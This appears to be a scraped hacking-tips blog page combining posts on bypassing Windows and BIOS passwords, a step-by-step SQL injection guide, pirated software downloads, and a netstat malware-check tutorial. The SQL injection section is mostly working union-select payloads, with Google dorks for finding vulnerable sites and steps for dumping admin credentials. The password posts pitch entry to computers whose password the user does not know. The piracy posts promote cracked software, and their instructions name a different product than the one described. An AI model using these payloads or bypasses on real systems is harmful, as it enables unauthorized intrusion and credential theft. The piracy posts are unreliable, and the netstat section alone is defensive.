How to Hack Windows Administrator Password Windows 7,xp,vista

This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.

• You do not need to know the old password to set a new one
• Will detect and offer to unlock locked or disabled out user accounts!
• There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

 

How it works?

 

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.

The download link for both CD and floppy drives along with the complete instructions is given below

Offline NT Password & Reg Editor Download

It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

 

Another simple way to reset non-administrator account passwords

 

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.

1. Open the command prompt (Start->Run->type cmd->Enter)

2. Now type net user and hit Enter

3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows

4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

How To Crack BIOS Password

Here is the best way to crack the bios password in windows. This one pc tricks is so small to perform.

Follow the steps below to perform this pc tricks
1) Boot up windows.

2) go to dos-prompt or go to command prompt directly from the windows start up menu.

3) type the command at the prompt: "debug" (without quotes)

4) type the following lines now exactly as given.......

o 70 10
o 71 20
quit
exit

4) exit from the dos prompt and restart the machine

password protection gone!!!!!!!!!!!!!
EnjoYYYYYYYYYY

Note: I have tested this in Award Bios........
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine...........

I have not found any other trouble if the codes are used during this pc tricks.

To be on safe side, just back up your data..........

The use of this code is entirely at ur risk.......... It worked fine for me.........

Hacking website using SQL Injection -step by step guide

Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.



Some List of Database are:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,



SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:

SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:
Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.


Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:

site:www.victimsite.com inurl:index.php?id=

 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:

http://www.victimsite.com/index.php?id=2'

 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number andorder by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:

http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4

 change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)
 

 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Like this:



Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
 if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

 Now it will show the list of table names. Find the table name which is related with the admin or user.




Now select the "admin " table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.


Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.


Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:

http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/

etc.
If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A...t.zip.html

Note:
This is just for educational purpose only. Discussing or Reading about thief technique is not crime but implementing.

CopyRights Please Stop Stealing contents from BreakTheSecurity. I am working hard to create an article, you simply copying? Please respect our hard work. Atleast place backlink to our site.

Download TuneUp Utilities 12.0 (2012) Full Free Mediafire

Uncompromising performance, maximum battery life, a clutter-free PC experience and smart energy efficiency – that‘s exactly what you get with an all-new TuneUp Utilities™ 2012. Packed full with more than 30 tools, we guaranteed that your PC is in top shape!
screen shots:

Discover All New Features:
It’s Windows® like you’ve never seen it before, all thanks to two truly unique technologies built into TuneUp Utilities™ 2012.
Our revamped Program Deactivator restores over 50% of speed and free space on bogged-down PCs, while TuneUp Economy Mode improves battery life by up to 30% and is nothing short of an energy-saving miracle.
And now it’s easier than ever to optimize your PC thanks to our fully redesigned Start Center.
-TuneUp Economy Mode
-TuneUp Program Deactivator

Improve Performance and Battery Life:
Massive performance loss and unbearable slowdowns don’t just occur on ancient Windows® XP machines. As a matter of fact, they oftentimes hit even the fastest Windows® 7 laptops and desktops around. But not anymore!
TuneUp Utilities™ 2012 takes your PC to the next performance level, guaranteeing lightning-fast application load times and extended battery life that can endure even the longest trips.
-TuneUp Program Deactivator
-TuneUp Economy Mode
-Turbo Mode
-TuneUp Live Optimization
-Disable startup programs
-Accelerate system startup and shutdown
-Defragment hard disk

Take Care of Your PC and Data Clutter:
The perfect PC cleanup in less than 5 minutes? Now it’s easier than ever thanks to TuneUp Utilities™ 2012 which removes thousands of megabytes of Windows® clutter while refreshing your registry and deleting massive disk space hogs. The all-in-one maintenance of TuneUp Utilities™ 2012 makes sure your PC becomes cleaner and faster than ever before.
-1-Click-Maintenance & Automatic Maintenance
-Clean hard disk
-Uninstall unneeded programs
-Defragment, Clean and Edit the Registry
-Find and Delete Large Amounts of Data
-Remove Broken Shortcuts

Restore and Secure-Wipe Files:
Keeping your data private and secure is crucial. TuneUp Utilities™ top three tools enable you to restore accidentally deleted files, clean out data tracesfrom your hard disk, and securely wipe sensitive files in order to prevent them from falling into the wrong hands.
-Restore deleted files
-Clean hard disk
-Delete files safely

Analyze and troubleshoot your PC:
Tired of calling up PC experts or costly tech hotlines? Then help yourself with TuneUp Utilities™. Its easy-to-use wizards and diagnostic tools help you find vulnerabilities, errors, and your PC’s untapped performance potential. With TuneUp Utilities™ you’ll get rid of the most annoying Windows® problems of all time with just a few clicks and push your PC to perform better than ever.
-Show system information
-Status & recommendations (category)
-Optimization status
-Increase performance – recommendations
-Program rating
-Display and close running processes
-Detect and fix problems
-Check hard disk for errors

Personalize Windows®:
Bored with the same Windows® themes, logon screens or icons? Ready to give your PC a makeover? TuneUp Utilities™ 2012 offers unique customization possibilities that’ll transform the same old and boring Windows® XP “Luna” and Windows® 7 “Aero” design to something new, sleek, and exciting. And once you’re done with that, TuneUp System Control helps you adjust more than 400 hidden Windows® and program settings.
-Customize the appearance of Windows® (TuneUp Styler)
-Customize options and behaviors (TuneUp System Control)

More Great Features:
With its elegant and powerful Start Center interface, TuneUp Utilities™ guides users through all their optimization steps and helps them solve issues with their PC, Windows®, or 3rd party software. Thanks to our brand new Settings Center, you’ll also have instant access to the most important settings and update features of TuneUp Utilities™ 2012. And once you’re done, the Optimization Report provides you with a complete history of problems solved, tuning steps performed, and data clutter removed.
-Start Center
-Overview of all functions
-TuneUp Utilities Settings Center
-TuneUp Utilities Settings Center
-Check for Updates
-Optimization Report

How To Use:
1)Install “Glary Utilities Pro”.
2)Click On “Glary Utilities Pro Serials”.
3)Choose A ‘UserName’ & ‘Serial’.
4)Register “Glary Utilities Pro”.
5)Enjoy!!!.

Download Now
Size: 36 mb

WinGuard Pro 7.0.4 Full Download

[b]WinGuard Pro[/b] lets you lock down any program, window or files on your computer with a password.
WinGuard Pro allows you to lock down the files and block people from installing new software on your personal computer.
WinGuard Pro is fully configurable with password time delays, screen blanking and so on. It has over 50 common build in programs like Control Panel, Windows Explorer, Add or Remove Programs, Internet Explorer, Run, the list is endless, and you can even add your own programs, windows and files to the list.
Best of all, WinGuard Pro is really easy to use, because you have so much already built in for you, you need not do much in your first stages. As your security needs grow, you can then start adding more items to its list to make your PC fool proof.
* Built-in programs: There are around 15 common programs built-in for locking
* Lock Programs, Applications, EXE Files with a Password
* Encrypt Files, Folders and Entire Drives
* Lock Windows at Boot and the Boot Keys (F8)
* Password Protect Windows Explorer
* Password Protect your Web Browser, inc. Internet Explorer and FireFox etc
* Disable Software Installation and Downloads to Help Prevent Unknown Virus Attacts
* Disable Zip and Self Extracting Files
* Lock your own programs: You can also add any of your own programs for locking.
* Password timer: You can set in seconds how long you want to give users to enter the password to access any locked programs. This can help deter hackers.
* Screen blank: You can have the screen blank in emergencies, this prevents any use of the computer, and blacks out the screen only leaving a password box to access the entire system.
*Additional Protection: This lets you lock even more features down on your PC. Such as the Desktop, My Computer, Internet Access, Internet Downloading, Software Installations and much more.
* Stop people installing software: This is a must have for those of you who are sick of users installing software on your computers without your consent. With this feature just a simple click is all that's needed and the software will disable Setup programs, Installers, Self Extracting Exe's, Zip files, the lot.
* Help prevent viruses: Using the above feature to stop software installs, this will help prevent such viruses that may be contained in program the user is trying to install.
* Lock or Encrypt your Files and Folders: Two methods of protection are available, including strong encryption.
Requirements:
* Visual Basic 6 Runtime on Windows 98/95/NT
Limitations:
* Some features are unavailable
What's New in This Release:
* Improved encryption routine
* Fixed a problem with some encryption passwords that contained unsupported characters
* Added 2 new features: No View on Drive and Enable Write-Protection on USB Flash drives (See Advanced>System Protection)
* Status bar now shown when encrypting files
* New look interface
* Remove programs from the Ignored Tasks List
* Improved secure uninstaller
* Updated Help File
* Improved protection of Main exe file from deletion, move, etc.
* New re-encrypt files automatically option

Download: CLICK ME

OR CLICK ME

[TUT] Using Netstat to find viruses

I havent seen anything cover this before (at least not this way of using netstat) and sometimes people want to know if they are infected by a RAT or something. This mini tutorial should help you out a little bit.

PART 1 - Preparing Task Manager

Open Task Manager (ctrl+alt+del). Go to the processes column and click View > Select Columns.




Check the top one (PID (Process Identifier))



Now, organize Task Manager by PID. This will make things easier to read for the next step.



PART 2 - Using Netstat to see Established Connections

Now you want to go into Start > Run > cmd > "netstat -ano". It should look similar to the picture below:



Only look for ESTABLISHED connections (it would be established if its a RAT or malicious), read the PID and crosscheck into Task Manager. Notice in my example that the only established connections use the PID 424. Lets take a look at what that is:





As we can see, its Firefox. Now lets say you notice the PID reads something like "svchost.exe". You should open the file location by right clicking it and pressing Open File Location and either scan it with Virustotal or check to see if in its legit location (if it was in Appdata or Program Files and it is svchost.exe, then you may have a problem).

Hope this helped some of you out and good luck